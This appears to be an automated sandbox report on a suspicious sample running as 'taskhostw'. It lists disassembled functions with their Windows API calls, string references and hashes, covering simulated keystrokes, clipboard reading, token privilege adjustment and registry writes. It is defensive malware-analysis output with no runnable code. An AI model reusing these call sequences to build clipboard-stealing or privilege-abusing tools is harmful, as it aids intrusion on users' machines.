SendMessageW.USER32 ref: 00D7D299
ClientToScreen.USER32(?,?), ref: 00D7D2EB
TrackPopupMenuEx.USER32 ref: 00D7D31F

Part of subcall function 00CF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CF25EC

GetWindowLongW.USER32(?,000000F0), ref: 00D7D3BB

Strings

@GUI_DRAGID, xrefs: 00D7CF06
F, xrefs: 00D7D29F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: efaddff6de6a5e3e73f5afe35af92e85e3810fa580800d8a03826bd3c301b567
Instruction ID: 7689b88dd09534f41b7389f0cef63e4c9889fa8b6de2431b3b77fe51622cc79e
Opcode Fuzzy Hash: efaddff6de6a5e3e73f5afe35af92e85e3810fa580800d8a03826bd3c301b567
Instruction Fuzzy Hash: 84428B74204301EFDB21DF24C845BAABBE5BF49710F188A1DF699D72A1E732D854CB62

Function 02A964FE Relevance: 71.5, APIs: 19, Strings: 19, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02A96723
_memset.LIBCMT ref: 02A96A99
_memmove.LIBCMT ref: 02A96C0C

Strings

9, xrefs: 02A965F9
, xrefs: 02A96649
o, xrefs: 02A9667B
]K, xrefs: 02AD1178
), xrefs: 02A965EF
n, xrefs: 02A96671
{, xrefs: 02A965DB
', xrefs: 02A96617
P\K, xrefs: 02AD120E
0, xrefs: 02A965E5
s{p, xrefs: 02A9712D
q, xrefs: 02A9668F
p, xrefs: 02A96685
+, xrefs: 02A965D1
<, xrefs: 02A96603
@, xrefs: 02AD33DE
R, xrefs: 02A9660D
-, xrefs: 02A96621
", xrefs: 02AD25E8

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memmove$_memset
String ID: $ ]K$"$'$)$+$-$0$9$<$@$P\K$R$n$o$p$q$s{p${
API String ID: 1357608183-3800155241
Opcode ID: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
Instruction ID: 70d75ab9a4a325832d59d48bafa92ad46be06e02c9867b5d452ce5523c33ee45
Opcode Fuzzy Hash: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
Instruction Fuzzy Hash: 1793A475E00215DFDF24CF99C880BADB7F1FF48714F24816AE95AAB291EB709981CB50

Function 00D070FE Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D07323
_memset.LIBCMT ref: 00D07699
_memmove.LIBCMT ref: 00D0780C

Strings

DEFINE, xrefs: 00D42459
Q\E, xrefs: 00D0812B
[:<:]], xrefs: 00D075D9
[:>:]], xrefs: 00D075F2
\b(?<=\w), xrefs: 00D43AC9
\b(?=\w), xrefs: 00D43ABF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: e3ecca9fd40f88fed6cea914d4adc70b4e082c4f310b0b4ae594bee9e290b94e
Instruction ID: 6e7a8c8d1086deac9ce60ed1984f7c3d3cdc3a33afcc2d92bc8bbe7fa9589250
Opcode Fuzzy Hash: e3ecca9fd40f88fed6cea914d4adc70b4e082c4f310b0b4ae594bee9e290b94e
Instruction Fuzzy Hash: E0939375E00215DBDF24CF98D881BADB7B1FF48710F69816AE959EB280E7709D81CB60

Function 00CF4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00CF4A3D
FindWindowW.USER32 ref: 00D2D9BE
IsIconic.USER32(?), ref: 00D2D9C7
ShowWindow.USER32(?,00000009), ref: 00D2D9D4
SetForegroundWindow.USER32(?), ref: 00D2D9DE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D2D9F4
GetCurrentThreadId.KERNEL32 ref: 00D2D9FB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D2DA07
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D2DA18
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D2DA20
AttachThreadInput.USER32(00000000,?,00000001), ref: 00D2DA28
SetForegroundWindow.USER32(?), ref: 00D2DA2B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2DA40
keybd_event.USER32 ref: 00D2DA4B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2DA55
keybd_event.USER32 ref: 00D2DA5A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2DA63
keybd_event.USER32 ref: 00D2DA68
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2DA72
keybd_event.USER32 ref: 00D2DA77
SetForegroundWindow.USER32(?), ref: 00D2DA7A
AttachThreadInput.USER32(?,?,00000000), ref: 00D2DAA1

Strings

Shell_TrayWnd, xrefs: 00D2D9B9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 0132f8329e2ea9a98ad459dd2f06c2b312c4414ee2b575af25740bf7f7941533
Instruction ID: 6722d9afea840c96f40b6e524aa8a4eefc790ddd29dc7800a1905917f54da055
Opcode Fuzzy Hash: 0132f8329e2ea9a98ad459dd2f06c2b312c4414ee2b575af25740bf7f7941533
Instruction Fuzzy Hash: 3F315271A44328BAEB306FA1DC49F7F7E6DEB54B50F144025FA08EA2D0D6B05D41AAB0

Function 00D48638 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00D48AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D48AED
Part of subcall function 00D48AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D48B1A
Part of subcall function 00D48AA3: GetLastError.KERNEL32 ref: 00D48B27

_memset.LIBCMT ref: 00D4867B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D486CD
CloseHandle.KERNEL32(?), ref: 00D486DE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D486F5
GetProcessWindowStation.USER32 ref: 00D4870E
SetProcessWindowStation.USER32 ref: 00D48718
OpenDesktopW.USER32 ref: 00D48732

Part of subcall function 00D484F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D48631), ref: 00D48508
Part of subcall function 00D484F3: CloseHandle.KERNEL32(?), ref: 00D4851A

Strings

default, xrefs: 00D4872D
, xrefs: 00D4868A
winsta0, xrefs: 00D486F0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: d5f5a192293adea762352d8fd123de0a74fe2ca18251f559572a77f3f2346029
Instruction ID: ec2000962accc17df14fbf9f3eeb57e6de6dcc12eb0dd3cc44c7810bd84daec0
Opcode Fuzzy Hash: d5f5a192293adea762352d8fd123de0a74fe2ca18251f559572a77f3f2346029
Instruction Fuzzy Hash: AC815A71800209AFDF219FA4EC45AEE7BB8EF04384F584169F919B6261DB318E55EB70

Function 00D6407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00D7F910), ref: 00D640A6
IsClipboardFormatAvailable.USER32(0000000D), ref: 00D640B4
GetClipboardData.USER32 ref: 00D640BC
CloseClipboard.USER32 ref: 00D640C8
GlobalLock.KERNEL32(00000000), ref: 00D640E4
CloseClipboard.USER32 ref: 00D640EE
GlobalUnlock.KERNEL32(00000000), ref: 00D64103
IsClipboardFormatAvailable.USER32(00000001), ref: 00D64110
GetClipboardData.USER32 ref: 00D64118
GlobalLock.KERNEL32(00000000), ref: 00D64125
GlobalUnlock.KERNEL32(00000000), ref: 00D64159
CloseClipboard.USER32 ref: 00D64269

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: fc5376af9bccae5fa81294fbc9d61e5ada5e74b0dbef5b7316b51724f3fcac01
Instruction ID: b5445868b7b0d6d2b8b327b54596aa73232b1b896ffbd39942463af489aded16
Opcode Fuzzy Hash: fc5376af9bccae5fa81294fbc9d61e5ada5e74b0dbef5b7316b51724f3fcac01
Instruction Fuzzy Hash: 2B519C35208305ABD720EF60DC99F7E77A8AF84B00F140529F68AD22E1EF70D9459B76

Function 00D5C7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D5C819
FindClose.KERNEL32(00000000), ref: 00D5C86D
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D5C892
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D5C8A9
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D5C8D0
__swprintf.LIBCMT ref: 00D5C91C
__swprintf.LIBCMT ref: 00D5C95F

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

__swprintf.LIBCMT ref: 00D5C9B3

Part of subcall function 00D13818: __woutput_l.LIBCMT ref: 00D13871

__swprintf.LIBCMT ref: 00D5CA01

Part of subcall function 00D13818: __flsbuf.LIBCMT ref: 00D13893
Part of subcall function 00D13818: __flsbuf.LIBCMT ref: 00D138AB

__swprintf.LIBCMT ref: 00D5CA50
__swprintf.LIBCMT ref: 00D5CA9F
__swprintf.LIBCMT ref: 00D5CAEE

Strings

%4d, xrefs: 00D5C959
%02d, xrefs: 00D5C9A7, 00D5C9B1, 00D5C9FF, 00D5CA4E, 00D5CA9D, 00D5CAEC
%4d%02d%02d%02d%02d%02d, xrefs: 00D5C916

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 9f899d11841d41d2d763857ea9c8c7861b71301a9a70a3e48217b8d76f8d40cc
Instruction ID: 2f17a6e9833aaa16db9b2c08d0d0bf16ed8a035d8bed22e98307c310f68ec5a9
Opcode Fuzzy Hash: 9f899d11841d41d2d763857ea9c8c7861b71301a9a70a3e48217b8d76f8d40cc
Instruction Fuzzy Hash: 0FA120B1418304AFCB50EB94D886EBFB7ECFF94705F404919B686C6191EA34DA48DB63

Function 00D5F021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00D5F042
_wcscmp.LIBCMT ref: 00D5F057
_wcscmp.LIBCMT ref: 00D5F06E
GetFileAttributesW.KERNEL32(?), ref: 00D5F080
SetFileAttributesW.KERNEL32(?,?), ref: 00D5F09A
FindNextFileW.KERNEL32(00000000,?), ref: 00D5F0B2
FindClose.KERNEL32(00000000), ref: 00D5F0BD
FindFirstFileW.KERNEL32(*.*,?), ref: 00D5F0D9
_wcscmp.LIBCMT ref: 00D5F100
_wcscmp.LIBCMT ref: 00D5F117
SetCurrentDirectoryW.KERNEL32(?), ref: 00D5F129
SetCurrentDirectoryW.KERNEL32(00DA8920), ref: 00D5F147
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5F151
FindClose.KERNEL32(00000000), ref: 00D5F15E
FindClose.KERNEL32(00000000), ref: 00D5F170

Strings

*.*, xrefs: 00D5F0D4

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 1b77b12d4d2e8503f6587ef058c67862451e1ac26b42d5bf90d5c12842482565
Instruction ID: ae2455bc55cdf19caf64d992d4b1a72e4a12aae984c243fb59d3f5106dd90aeb
Opcode Fuzzy Hash: 1b77b12d4d2e8503f6587ef058c67862451e1ac26b42d5bf90d5c12842482565
Instruction Fuzzy Hash: 9C31B632500719AADF20ABB4EC49EEE77ACDF05361F184175EC09D61A1EB30DA89CA75

Function 00D708E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D709DE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00D7F910,00000000,?,00000000,?,?), ref: 00D70A4C
RegCloseKey.ADVAPI32(00000000), ref: 00D70A94
RegSetValueExW.ADVAPI32 ref: 00D70B1D
RegCloseKey.ADVAPI32(?), ref: 00D70E3D
RegCloseKey.ADVAPI32(00000000), ref: 00D70E4A

Strings

REG_BINARY, xrefs: 00D70DD8
REG_DWORD, xrefs: 00D70D0E
REG_SZ, xrefs: 00D70B5B
REG_EXPAND_SZ, xrefs: 00D70ABA
REG_MULTI_SZ, xrefs: 00D70C05
REG_QWORD, xrefs: 00D70D8B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ba53c2009bdfbf8e6635af1ade9e653bc7545ba9cd74b155e3dc1d21e83d0c2a
Instruction ID: 2bf7f36f7fcc5b43391d8253f156fa292bb8a2e059c410f99ea40d6ba88f5263
Opcode Fuzzy Hash: ba53c2009bdfbf8e6635af1ade9e653bc7545ba9cd74b155e3dc1d21e83d0c2a
Instruction Fuzzy Hash: 82025D752046019FCB14DF24C851E2ABBE5FF88314F05885DF98A9B3A2DB70ED41DBA2

Function 00D5F17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00D5F19F
_wcscmp.LIBCMT ref: 00D5F1B4
_wcscmp.LIBCMT ref: 00D5F1CB

Part of subcall function 00D543C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D543E1

FindNextFileW.KERNEL32(00000000,?), ref: 00D5F1FA
FindClose.KERNEL32(00000000), ref: 00D5F205
FindFirstFileW.KERNEL32(*.*,?), ref: 00D5F221
_wcscmp.LIBCMT ref: 00D5F248
_wcscmp.LIBCMT ref: 00D5F25F
SetCurrentDirectoryW.KERNEL32(?), ref: 00D5F271
SetCurrentDirectoryW.KERNEL32(00DA8920), ref: 00D5F28F
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5F299
FindClose.KERNEL32(00000000), ref: 00D5F2A6
FindClose.KERNEL32(00000000), ref: 00D5F2B8

Strings

*.*, xrefs: 00D5F21C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 830bf5b8c65306ef2ccee1c36f1e066845a00a1dc942cc32d95ab72726e33331
Instruction ID: 917eb1d097c4b4fd07db9f728d2000cad9597e7e34c15bb7cfc88345b9f99844
Opcode Fuzzy Hash: 830bf5b8c65306ef2ccee1c36f1e066845a00a1dc942cc32d95ab72726e33331
Instruction Fuzzy Hash: 5631D2765006197ECF20ABA4EC48ADE73ACDF05321F144175EC48E71A1EB70DE89CAB8

Function 00D5A279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D5A299
__swprintf.LIBCMT ref: 00D5A2BB
CreateDirectoryW.KERNEL32(?,00000000), ref: 00D5A2F8
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D5A31D
_memset.LIBCMT ref: 00D5A33C
_wcsncpy.LIBCMT ref: 00D5A378
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D5A3AD
CloseHandle.KERNEL32(00000000), ref: 00D5A3B8
RemoveDirectoryW.KERNEL32(?), ref: 00D5A3C1
CloseHandle.KERNEL32(00000000), ref: 00D5A3CB

Strings

:, xrefs: 00D5A2DC
\, xrefs: 00D5A2D1
\??\%s, xrefs: 00D5A2B5

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 263c1fbcf917dd11eabae1e6b54314b988d231fe98091a86d7764d7a9069d694
Instruction ID: f527e1d4ad42b3428d43eaadf270e83e0840306a8b5f3a0fb89292b839aa11ec
Opcode Fuzzy Hash: 263c1fbcf917dd11eabae1e6b54314b988d231fe98091a86d7764d7a9069d694
Instruction Fuzzy Hash: DC31B275900219ABDB209FA4DC45FEB37BCEF88745F5441B6FD08D6160EB7096888B35

Function 00D481D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D48546
Part of subcall function 00D4852A: GetLastError.KERNEL32(?,00D4800A,?,?,?), ref: 00D48550
Part of subcall function 00D4852A: GetProcessHeap.KERNEL32(00000008,?,?,00D4800A,?,?,?), ref: 00D4855F
Part of subcall function 00D4852A: HeapAlloc.KERNEL32(00000000,?,00D4800A,?,?,?), ref: 00D48566
Part of subcall function 00D4852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D4857D

Part of subcall function 00D485C7: GetProcessHeap.KERNEL32(00000008,00D48020,00000000,00000000,?,00D48020,?), ref: 00D485D3
Part of subcall function 00D485C7: HeapAlloc.KERNEL32(00000000,?,00D48020,?), ref: 00D485DA
Part of subcall function 00D485C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D48020,?), ref: 00D485EB

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D48238
_memset.LIBCMT ref: 00D4824D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D4826C
GetLengthSid.ADVAPI32(?), ref: 00D4827D
GetAce.ADVAPI32(?,00000000,?), ref: 00D482BA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D482D6
GetLengthSid.ADVAPI32(?), ref: 00D482F3
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D48302
HeapAlloc.KERNEL32(00000000), ref: 00D48309
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D4832A
CopySid.ADVAPI32(00000000), ref: 00D48331
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D48362
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D48388
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D4839C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d45d0e351060d08a916de5d04410b63733014377d198c9af51ea819b0c0fd01e
Instruction ID: 1d47c470a797a8d3a8d8972616120f47b505387caffe00d3c21d11c788a43075
Opcode Fuzzy Hash: d45d0e351060d08a916de5d04410b63733014377d198c9af51ea819b0c0fd01e
Instruction Fuzzy Hash: BD61387190020AEFDF10DFA4DC49AEEBBB9FF05740F048169E915E6291EB319A45EB70

Function 00D06841 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CR), xrefs: 00D415DD
LIMIT_MATCH=, xrefs: 00D414C6
ANYCRLF), xrefs: 00D41651
UTF), xrefs: 00D41450
NO_START_OPT), xrefs: 00D414A5
LF), xrefs: 00D415FA
ANY), xrefs: 00D41634
UCP), xrefs: 00D41463
BSR_UNICODE), xrefs: 00D4168E
UTF16), xrefs: 00D41425
LIMIT_RECURSION=, xrefs: 00D41552
BSR_ANYCRLF), xrefs: 00D41674
NO_AUTO_POSSESS), xrefs: 00D41484
CRLF), xrefs: 00D41617

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
